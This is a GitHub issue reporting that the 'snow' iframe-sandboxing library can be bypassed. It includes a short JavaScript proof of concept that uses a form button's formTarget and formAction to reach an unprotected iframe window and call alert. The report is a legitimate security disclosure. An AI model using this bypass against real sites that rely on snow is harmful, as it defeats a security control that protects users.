snow icon indicating copy to clipboard operation
snow copied to clipboard

Snow can be bypassed with forms and buttons formAction

Open hackvertor opened this issue 1 year ago • 1 comments

setInterval(x=>xyz.alert(1337),0);
i=document.createElement('iframe');
i.name='xyz';
f=document.createElement('form');
b=document.createElement('button');
b.formTarget='xyz';
b.formAction='1';
f.append(b);
document.body.append(f);
document.body.append(i);
b. click()

hackvertor avatar Oct 16 '23 17:10 hackvertor